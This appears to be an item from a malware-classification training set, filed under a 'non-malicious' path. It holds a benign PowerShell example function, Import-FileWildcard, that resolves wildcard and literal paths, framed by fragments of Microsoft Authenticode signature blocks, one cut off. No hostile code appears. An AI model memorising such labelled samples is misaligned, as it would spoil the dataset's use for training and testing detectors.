TjpGMDAyLTA1RTAtRDk0NzElMCMGA1UEAxMcTWljcm9z // SIG // b2Z0IFRpbWUtU3RhbXAgU2VydmljZaIjCgEBMAcGBSsO // SIG // AwIaAxUAa4veN3BSx9k30BHwdOUiyAoO+AiggYMwgYCk // SIG // fjB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGlu // SIG // Z3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMV // SIG // TWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYDVQQDEx1N // SIG // aWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDANBgkq // SIG // hkiG9w0BAQsFAAIFAOnlWHcwIhgPMjAyNDA1MDgwMTQ4 // SIG // MzlaGA8yMDI0MDUwOTAxNDgzOVowdDA6BgorBgEEAYRZ // SIG // CgQBMSwwKjAKAgUA6eVYdwIBADAHAgEAAgIriDAHAgEA // SIG // AgIT5DAKAgUA6eap9wIBADA2BgorBgEEAYRZCgQCMSgw // SIG // JjAMBgorBgEEAYRZCgMCoAowCAIBAAIDB6EgoQowCAIB // SIG // AAIDAYagMA0GCSqGSIb3DQEBCwUAA4IBAQAJAp8ofJQ/ // SIG // pSNvfoPf2aqj2EAspUUsVYVpDQE/KBRJpm0OQdTwdQdw // SIG // bI8qXIcGyhUXxYeAuy7DG7qhG55YaI2O1GpfL7t9tvQ4 // SIG // CxFbogbonWJ5FFsGtixcSRTuJsTQ+Hbcin1BKv2TVk3P // SIG // KG07MGelLG24PQf31QOpQ4X+m+urVreSZc0HMBxSekbp // SIG // V013RrFdE/wSz/97mB13LulLnn5WVWfB/vjYwM/vTU0k // SIG // J7sv1wfs0ISSPgBgwumJ/2T+Ev7boP66cLgL0kXLa6tq // SIG // 4RDiGtUNZTfZ0ZhQuOQmJ+dRdnr+GAI4IR6DQn9kUYhS // SIG // 5p62GGPNrCGhIWI9oHfb464SMYIEDTCCBAkCAQEwgZMw // SIG // fDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0 // SIG // b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1p // SIG // Y3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWlj // SIG // cm9zb2Z0IFRpbWUtU3RhbXAgUENBIDIwMTACEzMAAAHy // SIG // PjLXZKxwkZQAAQAAAfIwDQYJYIZIAWUDBAIBBQCgggFK // SIG // MBoGCSqGSIb3DQEJAzENBgsqhkiG9w0BCRABBDAvBgkq // SIG // hkiG9w0BCQQxIgQgji0VPEYbwuWvphaLRWt/T0zgvo21 // SIG // CmhQsvCOfoHUNQAwgfoGCyqGSIb3DQEJEAIvMYHqMIHn // SIG // MIHkMIG9BCD42j4dLjFSXNOPmOEbuQVFGxxOLLmep0R0 // SIG // lLtF10pDRDCBmDCBgKR+MHwxCzAJBgNVBAYTAlVTMRMw // SIG // EQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRt // SIG // b25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRp // SIG // b24xJjAkBgNVBAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1w // SIG // IFBDQSAyMDEwAhMzAAAB8j4y12SscJGUAAEAAAHyMCIE // SIG // IHXf7zuyrcXZyRR32Lz2j7iXEwF9WcDW6WES+7f6HyAg // SIG // MA0GCSqGSIb3DQEBCwUABIICAAYcDwzjjfL+/RFN4eAU // SIG // gtm5+GwmQDDck12g9er/NIlb0mGilz0UOj5BUbGyk/NE // SIG // Z3niIoLNKXdxBfuxz0pYBlW/i5UIVJ3OWCo5TKH802TA // SIG // 6ZGCxIYGIwzIImrr0aXkVTYCv6IE0SLn7kpvZXcvawe6 // SIG // QxjJaJ2M2vsETUSDtWCSpxsLX32Q50bL38LyhcZCQO0E // SIG // 0DFZtGzVrScHTqqsXys2xHFBT1LgKZuSch8i3H/UDjLm // SIG // ZLCRKvlmUeOrRkGF/fSNuGLx4t7qrhbDyDmiasNM7wil // SIG // DQrgshiXhE7R387RKKgA+JvfALLZkaSIQ0okxfPalp9b // SIG // nhYSKf6YeRtPw3zBeUezCTrWihS2MhVaor6XMv+OeeMW // SIG // QBVQ0V5yBzA+Lq+kigSZVIJ1NTcAP8EUOHMcELGgVB0s // SIG // Qd8Qsynn/1W4gp0tnGu3t/4+CHr1gF+tvEpdaW7258+V // SIG // JSO9Bl4wPVETaOPr9ixnq5xfoh0z9oBDO5U8fnWTZtAl // SIG // d36p4BGJm4LxmtqvBbKm8ikcDth+gFG44sv8thENFLbB // SIG // /RXDDLbtJUaPDk/52G+fQuUiROMFHPf/uErA3ao3/SjT // SIG // 1CVzV6hOjYm4j8ipFnqjmfeM3wbJSYRHqPVCp5oslNo2 // SIG // xwVayUmp0sXJJzKuV/UReWLn5nsgIEH6Zst2lXkRkSWc // SIG // 1yoC // SIG // End signature block
combined_dataset/train/non-malicious/sample_47_56.ps1
sample_47_56.ps1
<# .SYNOPSIS Demonstrates how to write a command that works with paths that allow wildards and must exist. .DESCRIPTION This command also demonstrates how you need to supply a LiteralPath parameter when your Path parameter accepts wildcards. This is in order to handle paths like foo[1].txt. If you pass this path to the Path parameter, it will fail to find this file because "[1]" is interpreted as a wildcard spec e.g it resolves to foo1.txt. The LiteralPath parameter is used in this case as it does not interpret wildcard chars. .EXAMPLE C:\PS> Import-FileWildcard -LiteralPath ..\..\Tests\foo[1].txt -WhatIf This example shows how to use the LiteralPath parameter with a path that happens to use the wildcard chars "[" and "]". #> function Import-FileWildcard { [CmdletBinding(SupportsShouldProcess=$true, DefaultParameterSetName='Path')] param( # Specifies a path to one or more locations. Wildcards are permitted. [Parameter(Mandatory=$true, Position=0, ParameterSetName="Path", ValueFromPipeline=$true, ValueFromPipelineByPropertyName=$true, HelpMessage="Path to one or more locations.")] [ValidateNotNullOrEmpty()] [SupportsWildcards()] [string[]] $Path, # Specifies a path to one or more locations. Unlike the Path parameter, the value of the LiteralPath parameter is # used exactly as it is typed. No characters are interpreted as wildcards. If the path includes escape characters, # enclose it in single quotation marks. Single quotation marks tell Windows PowerShell not to interpret any # characters as escape sequences. [Parameter(Mandatory=$true, Position=0, ParameterSetName="LiteralPath", ValueFromPipelineByPropertyName=$true, HelpMessage="Literal path to one or more locations.")] [Alias("PSPath")] [ValidateNotNullOrEmpty()] [string[]] $LiteralPath ) begin { } process { # Modify [CmdletBinding()] to [CmdletBinding(SupportsShouldProcess=$true, DefaultParameterSetName='Path')] $paths = @() if ($psCmdlet.ParameterSetName -eq 'Path') { foreach ($aPath in $Path) { if (!(Test-Path -Path $aPath)) { $ex = New-Object System.Management.Automation.ItemNotFoundException "Cannot find path '$aPath' because it does not exist." $category = [System.Management.Automation.ErrorCategory]::ObjectNotFound $errRecord = New-Object System.Management.Automation.ErrorRecord $ex,'PathNotFound',$category,$aPath $psCmdlet.WriteError($errRecord) continue } # Resolve any wildcards that might be in the path $provider = $null $paths += $psCmdlet.SessionState.Path.GetResolvedProviderPathFromPSPath($aPath, [ref]$provider) } } else { foreach ($aPath in $LiteralPath) { if (!(Test-Path -LiteralPath $aPath)) { $ex = New-Object System.Management.Automation.ItemNotFoundException "Cannot find path '$aPath' because it does not exist." $category = [System.Management.Automation.ErrorCategory]::ObjectNotFound $errRecord = New-Object System.Management.Automation.ErrorRecord $ex,'PathNotFound',$category,$aPath $psCmdlet.WriteError($errRecord) continue } # Resolve any relative paths $paths += $psCmdlet.SessionState.Path.GetUnresolvedProviderPathFromPSPath($aPath) } } foreach ($aPath in $paths) { if ($pscmdlet.ShouldProcess($aPath, 'Operation')) { # Process each path $aPath } } } end { } } # SIG # Begin signature block # MIInvwYJKoZIhvcNAQcCoIInsDCCJ6wCAQExDzANBglghkgBZQMEAgEFADB5Bgor # BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG # KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCCecMEA+3UGEoHi # S74fkUX7cvdEM5hol2yPOdQsdQN/5qCCDXYwggX0MIID3KADAgECAhMzAAADrzBA # DkyjTQVBAAAAAAOvMA0GCSqGSIb3DQEBCwUAMH4xCzAJBgNVBAYTAlVTMRMwEQYD # VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNpZ25p # bmcgUENBIDIwMTEwHhcNMjMxMTE2MTkwOTAwWhcNMjQxMTE0MTkwOTAwWjB0MQsw # CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u # ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMR4wHAYDVQQDExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB # AQDOS8s1ra6f0YGtg0OhEaQa/t3Q+q1MEHhWJhqQVuO5amYXQpy8MDPNoJYk+FWA # hePP5LxwcSge5aen+f5Q6WNPd6EDxGzotvVpNi5ve0H97S3F7C/axDfKxyNh21MG # 0W8Sb0vxi/vorcLHOL9i+t2D6yvvDzLlEefUCbQV/zGCBjXGlYJcUj6RAzXyeNAN # xSpKXAGd7Fh+ocGHPPphcD9LQTOJgG7Y7aYztHqBLJiQQ4eAgZNU4ac6+8LnEGAL # go1ydC5BJEuJQjYKbNTy959HrKSu7LO3Ws0w8jw6pYdC1IMpdTkk2puTgY2PDNzB # tLM4evG7FYer3WX+8t1UMYNTAgMBAAGjggFzMIIBbzAfBgNVHSUEGDAWBgorBgEE # AYI3TAgBBggrBgEFBQcDAzAdBgNVHQ4EFgQURxxxNPIEPGSO8kqz+bgCAQWGXsEw # RQYDVR0RBD4wPKQ6MDgxHjAcBgNVBAsTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEW # MBQGA1UEBRMNMjMwMDEyKzUwMTgyNjAfBgNVHSMEGDAWgBRIbmTlUAXTgqoXNzci # tW2oynUClTBUBgNVHR8ETTBLMEmgR6BFhkNodHRwOi8vd3d3Lm1pY3Jvc29mdC5j # b20vcGtpb3BzL2NybC9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3JsMGEG # CCsGAQUFBwEBBFUwUzBRBggrBgEFBQcwAoZFaHR0cDovL3d3dy5taWNyb3NvZnQu # Y29tL3BraW9wcy9jZXJ0cy9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3J0 # MAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQELBQADggIBAISxFt/zR2frTFPB45Yd # mhZpB2nNJoOoi+qlgcTlnO4QwlYN1w/vYwbDy/oFJolD5r6FMJd0RGcgEM8q9TgQ # 2OC7gQEmhweVJ7yuKJlQBH7P7Pg5RiqgV3cSonJ+OM4kFHbP3gPLiyzssSQdRuPY # 1mIWoGg9i7Y4ZC8ST7WhpSyc0pns2XsUe1XsIjaUcGu7zd7gg97eCUiLRdVklPmp # XobH9CEAWakRUGNICYN2AgjhRTC4j3KJfqMkU04R6Toyh4/Toswm1uoDcGr5laYn # TfcX3u5WnJqJLhuPe8Uj9kGAOcyo0O1mNwDa+LhFEzB6CB32+wfJMumfr6degvLT # e8x55urQLeTjimBQgS49BSUkhFN7ois3cZyNpnrMca5AZaC7pLI72vuqSsSlLalG # OcZmPHZGYJqZ0BacN274OZ80Q8B11iNokns9Od348bMb5Z4fihxaBWebl8kWEi2O # PvQImOAeq3nt7UWJBzJYLAGEpfasaA3ZQgIcEXdD+uwo6ymMzDY6UamFOfYqYWXk # ntxDGu7ngD2ugKUuccYKJJRiiz+LAUcj90BVcSHRLQop9N8zoALr/1sJuwPrVAtx # HNEgSW+AKBqIxYWM4Ev32l6agSUAezLMbq5f3d8x9qzT031jMDT+sUAoCw0M5wVt # CUQcqINPuYjbS1WgJyZIiEkBMIIHejCCBWKgAwIBAgIKYQ6Q0gAAAAAAAzANBgkq # hkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24x # EDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlv # bjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlmaWNhdGUgQXV0aG9yaXR5 # IDIwMTEwHhcNMTEwNzA4MjA1OTA5WhcNMjYwNzA4MjEwOTA5WjB+MQswCQYDVQQG # EwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwG # A1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSgwJgYDVQQDEx9NaWNyb3NvZnQg # Q29kZSBTaWduaW5nIFBDQSAyMDExMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIIC # CgKCAgEAq/D6chAcLq3YbqqCEE00uvK2WCGfQhsqa+laUKq4BjgaBEm6f8MMHt03 # a8YS2AvwOMKZBrDIOdUBFDFC04kNeWSHfpRgJGyvnkmc6Whe0t+bU7IKLMOv2akr # rnoJr9eWWcpgGgXpZnboMlImEi/nqwhQz7NEt13YxC4Ddato88tt8zpcoRb0Rrrg # OGSsbmQ1eKagYw8t00CT+OPeBw3VXHmlSSnnDb6gE3e+lD3v++MrWhAfTVYoonpy # 4BI6t0le2O3tQ5GD2Xuye4Yb2T6xjF3oiU+EGvKhL1nkkDstrjNYxbc+/jLTswM9 # sbKvkjh+0p2ALPVOVpEhNSXDOW5kf1O6nA+tGSOEy/S6A4aN91/w0FK/jJSHvMAh # dCVfGCi2zCcoOCWYOUo2z3yxkq4cI6epZuxhH2rhKEmdX4jiJV3TIUs+UsS1Vz8k # A/DRelsv1SPjcF0PUUZ3s/gA4bysAoJf28AVs70b1FVL5zmhD+kjSbwYuER8ReTB # w3J64HLnJN+/RpnF78IcV9uDjexNSTCnq47f7Fufr/zdsGbiwZeBe+3W7UvnSSmn # Eyimp31ngOaKYnhfsi+E11ecXL93KCjx7W3DKI8sj0A3T8HhhUSJxAlMxdSlQy90 # lfdu+HggWCwTXWCVmj5PM4TasIgX3p5O9JawvEagbJjS4NaIjAsCAwEAAaOCAe0w # ggHpMBAGCSsGAQQBgjcVAQQDAgEAMB0GA1UdDgQWBBRIbmTlUAXTgqoXNzcitW2o # ynUClTAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTALBgNVHQ8EBAMCAYYwDwYD # VR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBRyLToCMZBDuRQFTuHqp8cx0SOJNDBa # BgNVHR8EUzBRME+gTaBLhklodHRwOi8vY3JsLm1pY3Jvc29mdC5jb20vcGtpL2Ny # bC9wcm9kdWN0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3JsMF4GCCsG # AQUFBwEBBFIwUDBOBggrBgEFBQcwAoZCaHR0cDovL3d3dy5taWNyb3NvZnQuY29t # L3BraS9jZXJ0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3J0MIGfBgNV # HSAEgZcwgZQwgZEGCSsGAQQBgjcuAzCBgzA/BggrBgEFBQcCARYzaHR0cDovL3d3 # dy5taWNyb3NvZnQuY29tL3BraW9wcy9kb2NzL3ByaW1hcnljcHMuaHRtMEAGCCsG # AQUFBwICMDQeMiAdAEwAZQBnAGEAbABfAHAAbwBsAGkAYwB5AF8AcwB0AGEAdABl # AG0AZQBuAHQALiAdMA0GCSqGSIb3DQEBCwUAA4ICAQBn8oalmOBUeRou09h0ZyKb # C5YR4WOSmUKWfdJ5DJDBZV8uLD74w3LRbYP+vj/oCso7v0epo/Np22O/IjWll11l # hJB9i0ZQVdgMknzSGksc8zxCi1LQsP1r4z4HLimb5j0bpdS1HXeUOeLpZMlEPXh6 # I/MTfaaQdION9MsmAkYqwooQu6SpBQyb7Wj6aC6VoCo/KmtYSWMfCWluWpiW5IP0 # wI/zRive/DvQvTXvbiWu5a8n7dDd8w6vmSiXmE0OPQvyCInWH8MyGOLwxS3OW560 # STkKxgrCxq2u5bLZ2xWIUUVYODJxJxp/sfQn+N4sOiBpmLJZiWhub6e3dMNABQam # ASooPoI/E01mC8CzTfXhj38cbxV9Rad25UAqZaPDXVJihsMdYzaXht/a8/jyFqGa # J+HNpZfQ7l1jQeNbB5yHPgZ3BtEGsXUfFL5hYbXw3MYbBL7fQccOKO7eZS/sl/ah # XJbYANahRr1Z85elCUtIEJmAH9AAKcWxm6U/RXceNcbSoqKfenoi+kiVH6v7RyOA # 9Z74v2u3S5fi63V4GuzqN5l5GEv/1rMjaHXmr/r8i+sLgOppO6/8MO0ETI7f33Vt # Y5E90Z1WTk+/gFcioXgRMiF670EKsT/7qMykXcGhiJtXcVZOSEXAQsmbdlsKgEhr # /Xmfwb1tbWrJUnMTDXpQzTGCGZ8wghmbAgEBMIGVMH4xCzAJBgNVBAYTAlVTMRMw # EQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVN # aWNyb3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNp # Z25pbmcgUENBIDIwMTECEzMAAAOvMEAOTKNNBUEAAAAAA68wDQYJYIZIAWUDBAIB # BQCgga4wGQYJKoZIhvcNAQkDMQwGCisGAQQBgjcCAQQwHAYKKwYBBAGCNwIBCzEO # MAwGCisGAQQBgjcCARUwLwYJKoZIhvcNAQkEMSIEIEReRVUL5tIjMQN0SXfaNRu+ # ZMskFd5ylF+v2vKF4xUZMEIGCisGAQQBgjcCAQwxNDAyoBSAEgBNAGkAYwByAG8A # cwBvAGYAdKEagBhodHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20wDQYJKoZIhvcNAQEB # BQAEggEAKQoc9Y5aVye1PsHwuIEAC27mnbaHnzLrigIQ1ZWig9oLPBmhpXDROLwu # onL7rnxkv5qaaHmdklLjgEC7qFVA6yruMTbQZAa7YGV4Sb3KX7knlHNm7TIVc6ZZ # +4pqWQX78K121gbWYPWsMDfq+CGFCChMl7UFOFrl24T4Y4BdbDgw6T+jkx4/kBLc # Z978ToAlniPlsmyKD/sFjSV2LmCLnHE8MEsw+bbFimEE/XJSn4gJjwGVjO3WvmN9 # xvKip29ANhjW63POOvbvCpUETQo9mpvbvNWwArcvq9v7FeFqrGyXVWBGx4wY2LyI # vH0CPKYA6Ibuv4+GU+MsN4hx9vdTkKGCFykwghclBgorBgEEAYI3AwMBMYIXFTCC # FxEGCSqGSIb3DQEHAqCCFwIwghb+AgEDMQ8wDQYJYIZIAWUDBAIBBQAwggFZBgsq # hkiG9w0BCRABBKCCAUgEggFEMIIBQAIBAQYKKwYBBAGEWQoDATAxMA0GCWCGSAFl # AwQCAQUABCDO7n0BgBzTyUiHSnbscQySIFM4gSxeU6M7q3nLfw3OggIGZfyDPrFa # GBMyMDI0MDQxNjIzNDI1My4wODJaMASAAgH0oIHYpIHVMIHSMQswCQYDVQQGEwJV # UzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UE # ChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMS0wKwYDVQQLEyRNaWNyb3NvZnQgSXJl # bGFuZCBPcGVyYXRpb25zIExpbWl0ZWQxJjAkBgNVBAsTHVRoYWxlcyBUU1MgRVNO # Ojg2REYtNEJCQy05MzM1MSUwIwYDVQQDExxNaWNyb3NvZnQgVGltZS1TdGFtcCBT # ZXJ2aWNloIIReDCCBycwggUPoAMCAQICEzMAAAHdXVcdldStqhsAAQAAAd0wDQYJ # KoZIhvcNAQELBQAwfDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24x # EDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlv # bjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUtU3RhbXAgUENBIDIwMTAwHhcNMjMx # MDEyMTkwNzA5WhcNMjUwMTEwMTkwNzA5WjCB0jELMAkGA1UEBhMCVVMxEzARBgNV # BAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jv # c29mdCBDb3Jwb3JhdGlvbjEtMCsGA1UECxMkTWljcm9zb2Z0IElyZWxhbmQgT3Bl # cmF0aW9ucyBMaW1pdGVkMSYwJAYDVQQLEx1UaGFsZXMgVFNTIEVTTjo4NkRGLTRC # QkMtOTMzNTElMCMGA1UEAxMcTWljcm9zb2Z0IFRpbWUtU3RhbXAgU2VydmljZTCC # AiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAKhOA5RE6i53nHURH4lnfKLp # +9JvipuTtctairCxMUSrPSy5CWK2DtriQP+T52HXbN2g7AktQ1pQZbTDGFzK6d03 # vYYNrCPuJK+PRsP2FPVDjBXy5mrLRFzIHHLaiAaobE5vFJuoxZ0ZWdKMCs8acjhH # UmfaY+79/CR7uN+B4+xjJqwvdpU/mp0mAq3earyH+AKmv6lkrQN8zgrcbCgHwsqv # vqT6lEFqYpi7uKn7MAYbSeLe0pMdatV5EW6NVnXMYOTRKuGPfyfBKdShualLo88k # G7qa2mbA5l77+X06JAesMkoyYr4/9CgDFjHUpcHSODujlFBKMi168zRdLerdpW0b # BX9EDux2zBMMaEK8NyxawCEuAq7++7ktFAbl3hUKtuzYC1FUZuUl2Bq6U17S4CKs # qR3itLT9qNcb2pAJ4jrIDdll5Tgoqef5gpv+YcvBM834bXFNwytd3ujDD24P9Dd8 # xfVJvumjsBQQkK5T/qy3HrQJ8ud1nHSvtFVi5Sa/ubGuYEpS8gF6GDWN5/KbveFk # dsoTVIPo8pkWhjPs0Q7nA5+uBxQB4zljEjKz5WW7BA4wpmFm24fhBmRjV4Nbp+n7 # 8cgAjvDSfTlA6DYBcv2kx1JH2dIhaRnSeOXePT6hMF0Il598LMu0rw35ViUWcAQk # UNUTxRnqGFxz5w+ZusMDAgMBAAGjggFJMIIBRTAdBgNVHQ4EFgQUbqL1toyPUdpF # yyHSDKWj0I4lw/EwHwYDVR0jBBgwFoAUn6cVXQBeYl2D9OXSZacbUzUZ6XIwXwYD # VR0fBFgwVjBUoFKgUIZOaHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9j # cmwvTWljcm9zb2Z0JTIwVGltZS1TdGFtcCUyMFBDQSUyMDIwMTAoMSkuY3JsMGwG # CCsGAQUFBwEBBGAwXjBcBggrBgEFBQcwAoZQaHR0cDovL3d3dy5taWNyb3NvZnQu # Y29tL3BraW9wcy9jZXJ0cy9NaWNyb3NvZnQlMjBUaW1lLVN0YW1wJTIwUENBJTIw # MjAxMCgxKS5jcnQwDAYDVR0TAQH/BAIwADAWBgNVHSUBAf8EDDAKBggrBgEFBQcD # CDAOBgNVHQ8BAf8EBAMCB4AwDQYJKoZIhvcNAQELBQADggIBAC5U2bINLgXIHWbM # cqVuf9jkUT/K8zyLBvu5h8JrqYR2z/eaO2yo1Ooc9Shyvxbe9GZDu7kkUzxSyJ1I # ZksZZw6FDq6yZNT3PEjAEnREpRBL8S+mbXg+O4VLS0LSmb8XIZiLsaqZ0fDEcv3H # eA+/y/qKnCQWkXghpaEMwGMQzRkhGwcGdXr1zGpQ7HTxvfu57xFxZX1MkKnWFENJ # 6urd+4teUgXj0ngIOx//l3XMK3Ht8T2+zvGJNAF+5/5qBk7nr079zICbFXvxtidN # N5eoXdW+9rAIkS+UGD19AZdBrtt6dZ+OdAquBiDkYQ5kVfUMKS31yHQOGgmFxuCO # zTpWHalrqpdIllsy8KNsj5U9sONiWAd9PNlyEHHbQZDmi9/BNlOYyTt0YehLbDov # mZUNazk79Od/A917mqCdTqrExwBGUPbMP+/vdYUqaJspupBnUtjOf/76DAhVy8e/ # e6zR98PkplmliO2brL3Q3rD6+ZCVdrGM9Rm6hUDBBkvYh+YjmGdcQ5HB6WT9Rec8 # +qDHmbhLhX4Zdaard5/OXeLbgx2f7L4QQQj3KgqjqDOWInVhNE1gYtTWLHe4882d # /k7Lui0K1g8EZrKD7maOrsJLKPKlegceJ9FCqY1sDUKUhRa0EHUW+ZkKLlohKrS7 # FwjdrINWkPBgbQznCjdE2m47QjTbMIIHcTCCBVmgAwIBAgITMwAAABXF52ueAptJ # mQAAAAAAFTANBgkqhkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNVBAgT # Cldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29m # dCBDb3Jwb3JhdGlvbjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlmaWNh # dGUgQXV0aG9yaXR5IDIwMTAwHhcNMjEwOTMwMTgyMjI1WhcNMzAwOTMwMTgzMjI1 # WjB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH # UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYDVQQD # Ex1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDCCAiIwDQYJKoZIhvcNAQEB # BQADggIPADCCAgoCggIBAOThpkzntHIhC3miy9ckeb0O1YLT/e6cBwfSqWxOdcjK # NVf2AX9sSuDivbk+F2Az/1xPx2b3lVNxWuJ+Slr+uDZnhUYjDLWNE893MsAQGOhg # fWpSg0S3po5GawcU88V29YZQ3MFEyHFcUTE3oAo4bo3t1w/YJlN8OWECesSq/XJp # rx2rrPY2vjUmZNqYO7oaezOtgFt+jBAcnVL+tuhiJdxqD89d9P6OU8/W7IVWTe/d # vI2k45GPsjksUZzpcGkNyjYtcI4xyDUoveO0hyTD4MmPfrVUj9z6BVWYbWg7mka9 # 7aSueik3rMvrg0XnRm7KMtXAhjBcTyziYrLNueKNiOSWrAFKu75xqRdbZ2De+JKR # Hh09/SDPc31BmkZ1zcRfNN0Sidb9pSB9fvzZnkXftnIv231fgLrbqn427DZM9itu # qBJR6L8FA6PRc6ZNN3SUHDSCD/AQ8rdHGO2n6Jl8P0zbr17C89XYcz1DTsEzOUyO # ArxCaC4Q6oRRRuLRvWoYWmEBc8pnol7XKHYC4jMYctenIPDC+hIK12NvDMk2ZItb # oKaDIV1fMHSRlJTYuVD5C4lh8zYGNRiER9vcG9H9stQcxWv2XFJRXRLbJbqvUAV6 # bMURHXLvjflSxIUXk8A8FdsaN8cIFRg/eKtFtvUeh17aj54WcmnGrnu3tz5q4i6t # AgMBAAGjggHdMIIB2TASBgkrBgEEAYI3FQEEBQIDAQABMCMGCSsGAQQBgjcVAgQW # BBQqp1L+ZMSavoKRPEY1Kc8Q/y8E7jAdBgNVHQ4EFgQUn6cVXQBeYl2D9OXSZacb # UzUZ6XIwXAYDVR0gBFUwUzBRBgwrBgEEAYI3TIN9AQEwQTA/BggrBgEFBQcCARYz # aHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9Eb2NzL1JlcG9zaXRvcnku # aHRtMBMGA1UdJQQMMAoGCCsGAQUFBwMIMBkGCSsGAQQBgjcUAgQMHgoAUwB1AGIA # QwBBMAsGA1UdDwQEAwIBhjAPBgNVHRMBAf8EBTADAQH/MB8GA1UdIwQYMBaAFNX2 # VsuP6KJcYmjRPZSQW9fOmhjEMFYGA1UdHwRPME0wS6BJoEeGRWh0dHA6Ly9jcmwu # bWljcm9zb2Z0LmNvbS9wa2kvY3JsL3Byb2R1Y3RzL01pY1Jvb0NlckF1dF8yMDEw # LTA2LTIzLmNybDBaBggrBgEFBQcBAQROMEwwSgYIKwYBBQUHMAKGPmh0dHA6Ly93 # d3cubWljcm9zb2Z0LmNvbS9wa2kvY2VydHMvTWljUm9vQ2VyQXV0XzIwMTAtMDYt # MjMuY3J0MA0GCSqGSIb3DQEBCwUAA4ICAQCdVX38Kq3hLB9nATEkW+Geckv8qW/q # XBS2Pk5HZHixBpOXPTEztTnXwnE2P9pkbHzQdTltuw8x5MKP+2zRoZQYIu7pZmc6 # U03dmLq2HnjYNi6cqYJWAAOwBb6J6Gngugnue99qb74py27YP0h1AdkY3m2CDPVt # I1TkeFN1JFe53Z/zjj3G82jfZfakVqr3lbYoVSfQJL1AoL8ZthISEV09J+BAljis # 9/kpicO8F7BUhUKz/AyeixmJ5/ALaoHCgRlCGVJ1ijbCHcNhcy4sa3tuPywJeBTp # kbKpW99Jo3QMvOyRgNI95ko+ZjtPu4b6MhrZlvSP9pEB9s7GdP32THJvEKt1MMU0 # sHrYUP4KWN1APMdUbZ1jdEgssU5HLcEUBHG/ZPkkvnNtyo4JvbMBV0lUZNlz138e # W0QBjloZkWsNn6Qo3GcZKCS6OEuabvshVGtqRRFHqfG3rsjoiV5PndLQTHa1V1QJ # sWkBRH58oWFsc/4Ku+xBZj1p/cvBQUl+fpO+y/g75LcVv7TOPqUxUYS8vwLBgqJ7 # Fx0ViY1w/ue10CgaiQuPNtq6TPmb/wrpNPgkNWcr4A245oyZ1uEi6vAnQj0llOZ0 # dFtq0Z4+7X6gMTN9vMvpe784cETRkPHIqzqKOghif9lwY1NNje6CbaUFEMFxBmoQ # tB1VM1izoXBm8qGCAtQwggI9AgEBMIIBAKGB2KSB1TCB0jELMAkGA1UEBhMCVVMx # EzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoT # 